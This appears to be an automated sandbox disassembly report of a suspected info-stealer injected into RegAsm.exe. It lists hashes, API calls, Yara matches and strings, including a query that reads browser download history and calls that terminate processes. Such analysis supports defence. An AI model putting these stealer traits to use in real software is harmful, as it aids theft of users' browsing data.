                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d015dd2a7f34c451068c132c19013bc6b102c1382bca839e948fb3c3e2802f10
                                                    • Instruction ID: e33e3572ca720bed543e10fba22033a6bbe36e165a32b8ce0169b55903a816d4
                                                    • Opcode Fuzzy Hash: d015dd2a7f34c451068c132c19013bc6b102c1382bca839e948fb3c3e2802f10
                                                    • Instruction Fuzzy Hash: 3F41167A6047908ED3218F7894406D2FBF29F45261F1848AAE6DA8B652E22EF485D361
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FBA5985
                                                    • misuse, xrefs: 1FBA5980
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FBA5976
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 4dee6c66e731c8bbfde0f55c327c664e0fe1867c5ba594d1a1f141b5cc568fbf
                                                    • Instruction ID: f304025d08588409dc616e22ad8d377230a79c13e8264a0b2489372a6e5a6f4e
                                                    • Opcode Fuzzy Hash: 4dee6c66e731c8bbfde0f55c327c664e0fe1867c5ba594d1a1f141b5cc568fbf
                                                    • Instruction Fuzzy Hash: 0D41C875A183519BD310CA54EC80BDAB7E4EFC5320F850569FD449B251F32AFA94C7A1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: .B
                                                    • API String ID: 3510742995-2223122701
                                                    • Opcode ID: baa5ac8c085634893296bc95198d3ef19f3bf6896aab1c798a73eaf56a55e78e
                                                    • Instruction ID: 3936ad43011f4a34ae65407fdc409fee0955b5fb060a6ad75fe83edbfb145cce
                                                    • Opcode Fuzzy Hash: baa5ac8c085634893296bc95198d3ef19f3bf6896aab1c798a73eaf56a55e78e
                                                    • Instruction Fuzzy Hash: 5151B475A00209EFDB45CF98D582EAEBBF1BF08314F50805AE904AB352C775E991CF94
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA6540D
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA653FE
                                                    • database corruption, xrefs: 1FA65408
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d2cbfcf53f7559308e06489bc7864be563d2760d653e3601737b133fab3fdc5b
                                                    • Instruction ID: 3a75342b2437015f7547589c93229cea63c440df710ba5ec0fd3a745aee27ff1
                                                    • Opcode Fuzzy Hash: d2cbfcf53f7559308e06489bc7864be563d2760d653e3601737b133fab3fdc5b
                                                    • Instruction Fuzzy Hash: F5316D696407914ED7218F7998407E6B7E29F81B32F4404AEE9C9C7681F31EF492D361
                                                    Strings
                                                    • error in tokenizer constructor, xrefs: 1FB47F92
                                                    • no such tokenizer: %s, xrefs: 1FB47F1B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                    • API String ID: 0-815501780
                                                    • Opcode ID: 119c0d9d7b88d56b949b694f521f13c78e0eb099555bf21e46d5595709ecc50c
                                                    • Instruction ID: b7419f8cb2e181d9eae9225559308e9bd9ba0e3aec83cd4453cfd775871d2b8d
                                                    • Opcode Fuzzy Hash: 119c0d9d7b88d56b949b694f521f13c78e0eb099555bf21e46d5595709ecc50c
                                                    • Instruction Fuzzy Hash: DE31BE767013558FC720CF19E880AAAB3E4EF85665F24066DE989DB340E736FC05DB61
                                                    Strings
                                                    • second argument to nth_value must be a positive integer, xrefs: 1FA2F0C4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: second argument to nth_value must be a positive integer
                                                    • API String ID: 0-2620530100
                                                    • Opcode ID: ac7d5bd82d8b6bb357477d10ec093192bedda311808f0f5068caa576814f9d48
                                                    • Instruction ID: fb72b77376391a957d029b3782bdbf307859b1efba3c88fb63f73dfe0836495f
                                                    • Opcode Fuzzy Hash: ac7d5bd82d8b6bb357477d10ec093192bedda311808f0f5068caa576814f9d48
                                                    • Instruction Fuzzy Hash: 41314CB6B043029BDB109F24ED4161A77E8BF40320FC04669FD656A281F73EF9568692
                                                    APIs
                                                    • memcpy.MSVCRT ref: 0042064F
                                                    • ReadFile.KERNEL32(00000000,?,B,B,00000000,?,00420909,?,00004000), ref: 004206B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileReadmemcpy
                                                    • String ID: B$B
                                                    • API String ID: 1163090680-1683576927
                                                    • Opcode ID: 2874c96c1a3fb1d6f529222d988309bdd38897db4b5591327cded6f4bf57379f
                                                    • Instruction ID: 3350042a6c51f04880dfdfea5df5fcaa4f764afd8a650415a2b95efad18d2465
                                                    • Opcode Fuzzy Hash: 2874c96c1a3fb1d6f529222d988309bdd38897db4b5591327cded6f4bf57379f
                                                    • Instruction Fuzzy Hash: C041B874A00119EFDB00DF98C984EAEB7F1FF48304F5484A9E865AB362D731A951DF54
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentmemcpystd::_
                                                    • String ID: @$string too long
                                                    • API String ID: 1835169507-3505284975
                                                    • Opcode ID: 97d0f1b98fc2f47163ac69db9438ff46e1ccc5032542e301bc2461104f49f8a3
                                                    • Instruction ID: d64a219e406327f520cca0adf51a5824ce34410b5353565fc67751056c402b57
                                                    • Opcode Fuzzy Hash: 97d0f1b98fc2f47163ac69db9438ff46e1ccc5032542e301bc2461104f49f8a3
                                                    • Instruction Fuzzy Hash: AA41B774A0021AEFDF04DF98D9819EEBBB1FF09300F10445AE821AB351D779AA81DF59
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA65301
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA652F2
                                                    • database corruption, xrefs: 1FA652FC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: b7ef9beae62e0e6f7d660fcdbf0a3a467049bcc7bd4564e62cc4bac5b8d6643a
                                                    • Instruction ID: 720aa93a29e57ae37345a5e77676ce872be62684864ec3cdd0d4d330aa68c569
                                                    • Opcode Fuzzy Hash: b7ef9beae62e0e6f7d660fcdbf0a3a467049bcc7bd4564e62cc4bac5b8d6643a
                                                    • Instruction Fuzzy Hash: B11157BB6002006BCB105B98FC00CDBBFE5EFC46B6F0905A5FA4C56122E727E92197A1
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA6FE82
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA6FDE6, 1FA6FE61
                                                    • database corruption, xrefs: 1FA6FE7D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: efefe8dfd35c34d0932b0f4413f789346e63877856f959effd209e2211a7cdca
                                                    • Instruction ID: 9c219a41294027266e839b9a875736c52f8b4e424bedc21be7c47f2f9567b3e4
                                                    • Opcode Fuzzy Hash: efefe8dfd35c34d0932b0f4413f789346e63877856f959effd209e2211a7cdca
                                                    • Instruction Fuzzy Hash: 7B3118A81252818AD3158F24C400762BBA1BF55358FA4D5CDE8898F793E37FC4C7DBA6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s%s
                                                    • API String ID: 0-3252725368
                                                    • Opcode ID: adf5cd2804f4a3425e07da455d1c113dcdc186116f53f697e2d646e2eb386141
                                                    • Instruction ID: f2f6a164bd31dcc5b3af71a2d7ff77e5dc1ab44fa674fa28082aa83ea2b8b046
                                                    • Opcode Fuzzy Hash: adf5cd2804f4a3425e07da455d1c113dcdc186116f53f697e2d646e2eb386141
                                                    • Instruction Fuzzy Hash: 801193769042219BDB019B19D9C4A9737B9EF81679F040165FA48DA200EB3FA524D7E2
                                                    Strings
                                                    • JSON path error near '%q', xrefs: 1FAD1F92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: JSON path error near '%q'
                                                    • API String ID: 0-481711382
                                                    • Opcode ID: 76251ebce43c1d1d38e75680e8664ed9a34c75c1f7191f3f1fe1d763f5760ebc
                                                    • Instruction ID: 2eb0df3b6e11c426f85b2a69c30206bd4478d96d30708188761325ab0e921491
                                                    • Opcode Fuzzy Hash: 76251ebce43c1d1d38e75680e8664ed9a34c75c1f7191f3f1fe1d763f5760ebc
                                                    • Instruction Fuzzy Hash: 520104727093116EEB149A549D00B9B7BD4DF41330F20066DF895962D0EB7DF80183E2
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA31E63
                                                    • misuse, xrefs: 1FA31E59
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA31E53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: b8548fa615eb5398b4e0d56efbbf20ad042fa209eb00d9ac379126e4e047234f
                                                    • Instruction ID: f5a06e98c7facb637a92263028592e5d2a212c214e3fc3791b8a011e61480272
                                                    • Opcode Fuzzy Hash: b8548fa615eb5398b4e0d56efbbf20ad042fa209eb00d9ac379126e4e047234f
                                                    • Instruction Fuzzy Hash: 5A11E034F086509FD704CE38D844AA6BBB8AF46B16F240498E445CB322D33EF915C7A2
                                                    Strings
                                                    • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1FA4F105
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                    • API String ID: 0-2312637080
                                                    • Opcode ID: 0158df8079c84f167375b3e1266bfbf0cb8cc0ba52224f7369e19514ad3a72fd
                                                    • Instruction ID: d5eb36b4a6c0abfd74f7fa4a501f859cf55c9a525c4e7d8ea43ff49941dbb169
                                                    • Opcode Fuzzy Hash: 0158df8079c84f167375b3e1266bfbf0cb8cc0ba52224f7369e19514ad3a72fd
                                                    • Instruction Fuzzy Hash: 2201923A3043415ED321866EFC44F97B7D8EBC4620F190469F6ADC3201D369B8869671
                                                    Strings
                                                    • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1FA50D87
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                    • API String ID: 0-2312637080
                                                    • Opcode ID: a95a3b51dde77aa563aad239c66a8cc672628064e78196a9c39d2739834cde38
                                                    • Instruction ID: 0a41dd2cd5fa94f23568b74bc97b2bd8b4639ce82a91a74760ca5020325a7108
                                                    • Opcode Fuzzy Hash: a95a3b51dde77aa563aad239c66a8cc672628064e78196a9c39d2739834cde38
                                                    • Instruction Fuzzy Hash: 2A01697A244301AFE3509A59ED80F82B7E9EB88724F544458FA8DDB240E67ABC4587A1
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA2EFB5
                                                    • misuse, xrefs: 1FA2EFB0
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA2EFA6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 409153692e7f42a548164076e2550cc35fe88950d191a4fc00e818497e955d01
                                                    • Instruction ID: 276075d5d13025b61877b6b4503eb1ee359e51cbb05e75f67335091b3d5968eb
                                                    • Opcode Fuzzy Hash: 409153692e7f42a548164076e2550cc35fe88950d191a4fc00e818497e955d01
                                                    • Instruction Fuzzy Hash: F001B9B16096229FD700CF09D884B8B7BE1AFC1724F454458E7445B381D33AE855D7A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s_stat
                                                    • API String ID: 0-920702477
                                                    • Opcode ID: e64adb737920aa40e5617fd053bea3f89e1a8e3c1c2d26a2d1d8c3c5d2f18342
                                                    • Instruction ID: 0999128f204b459875824fac43b0772f76094da08f6e786d29d75873691b2bde
                                                    • Opcode Fuzzy Hash: e64adb737920aa40e5617fd053bea3f89e1a8e3c1c2d26a2d1d8c3c5d2f18342
                                                    • Instruction Fuzzy Hash: 72F0A723B057523BE70046B9BE84B46EBD9BF45160F554635E40D96144D31EBCA153E1
                                                    Strings
                                                    • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1FA47F76
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                    • API String ID: 0-3072645960
                                                    • Opcode ID: 76c291101993cdb54395a264f385b623e71c7dc73e86dc28f7940974482332db
                                                    • Instruction ID: 9bf1f2b3fcbf1cd90fc937b7efff1a605d7af2cabd97c4fb5cb393e0c6243da5
                                                    • Opcode Fuzzy Hash: 76c291101993cdb54395a264f385b623e71c7dc73e86dc28f7940974482332db
                                                    • Instruction Fuzzy Hash: FBF0F67670434246E7015F18FC01BC97BD4AFC1311F690129F8449A190E76CE88687B1
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00413607,00000000), ref: 00412F23
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00413607,00000000), ref: 00412F2A
                                                    • wsprintfW.USER32 ref: 00412F3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocProcesswsprintf
                                                    • String ID: %hs
                                                    • API String ID: 659108358-2783943728
                                                    • Opcode ID: a0c19f69ea0b9f3987ab3f26ec27759df59495924eabe1d63ab0b4f4564690e2
                                                    • Instruction ID: 3b1422cf69cd7ca1c0b0579ce03a421fdcb529f04941721c5eeb921f539e643a
                                                    • Opcode Fuzzy Hash: a0c19f69ea0b9f3987ab3f26ec27759df59495924eabe1d63ab0b4f4564690e2
                                                    • Instruction Fuzzy Hash: ACD05B70B40209FFDB109FD0EC0AF6D7B74FB01749F904074F50596151D6715E119BA9
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040961B
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040962F
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                    • String ID: Downloads$SELECT target_path, tab_url from downloads
                                                    • API String ID: 3799617333-2176162482
                                                    • Opcode ID: be7eee8a815c2336f96c2534ce6039717bf2e88eff6cc5c104359396644c2202
                                                    • Instruction ID: 0fc1ef9a9322aaf7dc15fdb1fbf797ad4d90eb8131d920194bec06f8da6e6953
                                                    • Opcode Fuzzy Hash: be7eee8a815c2336f96c2534ce6039717bf2e88eff6cc5c104359396644c2202
                                                    • Instruction Fuzzy Hash: 5E81DE729101189ADF04FBA1DCA6DEE7379AF14305F50452EF216B21F1EE399A88CA58
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2bffd2a73fa29da14e5fe807f868cd21d560acf72a7ffb1b5267154c030c0129
                                                    • Instruction ID: bcaa92d39f6056897e132bdc271e9b757d8cc628e46f42b7d412f6d933172867
                                                    • Opcode Fuzzy Hash: 2bffd2a73fa29da14e5fe807f868cd21d560acf72a7ffb1b5267154c030c0129
                                                    • Instruction Fuzzy Hash: 4F5107716043928AD711CE74984479AFFE8AF49311F094AA9E8C68B242E37DE588C361
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78eb3c5714f9baed358a88d4a131b275a33a19604123cbf6b370464640c7e9bb
                                                    • Instruction ID: 3cd5e9df97ee95ede4c8092c02cc18a3c41fdf3835b732dad5b62155f70df75a
                                                    • Opcode Fuzzy Hash: 78eb3c5714f9baed358a88d4a131b275a33a19604123cbf6b370464640c7e9bb
                                                    • Instruction Fuzzy Hash: 3041CD766007419FD314CF18DA81A52FBE4FB84324F28466EE94687A62E77AFC51CB90
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,00420AC0,00000000), ref: 004202BA
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042030A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 4c528a2b4f9c7a333cd45075c52160f11a3634f4101dfcee3a1bace1474a4fb7
                                                    • Instruction ID: 25bdba633ebdef6c6ef92716bb38623e39aa572bfebf4df96f3e676e54faa8ae
                                                    • Opcode Fuzzy Hash: 4c528a2b4f9c7a333cd45075c52160f11a3634f4101dfcee3a1bace1474a4fb7
                                                    • Instruction Fuzzy Hash: 1B51A475E00208DFDB04DFA8D845BDDBBF4AF08314F10815AE825AB2A2D775A945CF68
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                    • Instruction ID: e1b5cb46acb41b1867c62e3eaf34ed631238d892634d7de4956471d2d86b3725
                                                    • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                    • Instruction Fuzzy Hash: 7131D275504B819FD320CB29E84069BB7E0FF89350F2C896DD8DA86A00E37DF488C791
                                                    APIs
                                                    • memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 00412F18: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00413607,00000000), ref: 00412F23
                                                      • Part of subcall function 00412F18: HeapAlloc.KERNEL32(00000000,?,?,00413607,00000000), ref: 00412F2A
                                                      • Part of subcall function 00412F18: wsprintfW.USER32 ref: 00412F3E
                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                    • CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                    • String ID:
                                                    • API String ID: 396451647-0
                                                    • Opcode ID: c7819af78da3aface2338669f5ee0cd5672e73affc262f33d1c25756492d632b
                                                    • Instruction ID: 48b4c925d865bfc27fdbfc8eca322732b18303721b05e3df4f914965bfc7d476
                                                    • Opcode Fuzzy Hash: c7819af78da3aface2338669f5ee0cd5672e73affc262f33d1c25756492d632b
                                                    • Instruction Fuzzy Hash: C8311675A00208EFDF10EFE0CD49BDDBBB9AB15305F204066F506EA2A0DB789A85CF45
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                    • Instruction ID: 0188c0ff71e1e5598781aceb7ffc58215d9731b7c2201c2ee7b2096e350c1d0c
                                                    • Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                    • Instruction Fuzzy Hash: 3521D3756007059FD750EF68C980A5ABBF4EF98300F90087DF586C7211E339F6588B82
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1FC1F4E0
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 1FC1F4ED
                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1FC1F513
                                                    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1FC1F539
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: FilePointer$ErrorLast
                                                    • String ID:
                                                    • API String ID: 142388799-0
                                                    • Opcode ID: 458c6226e42038a89a900835fba55bda51d3b529219d47203d694f42dcd9b8a5
                                                    • Instruction ID: 49be01b492a95c7a5e284144f945a027f2aa982f355371577c9a89a1b98be0b7
                                                    • Opcode Fuzzy Hash: 458c6226e42038a89a900835fba55bda51d3b529219d47203d694f42dcd9b8a5
                                                    • Instruction Fuzzy Hash: 99112E7190811AFBDF119F56CC48DDE3F79EF00764F104144F928962A0D7329661FB90
                                                    APIs
                                                    • CreateFileA.KERNEL32(00416804,80000000,00000003,00000000,00000003,00000080,00000000,?,00416804,00000000), ref: 0041342E
                                                    • GetFileSizeEx.KERNEL32(000000FF,00416804), ref: 0041344A
                                                    • CloseHandle.KERNEL32(000000FF), ref: 00413457
                                                    Memory Dump Source
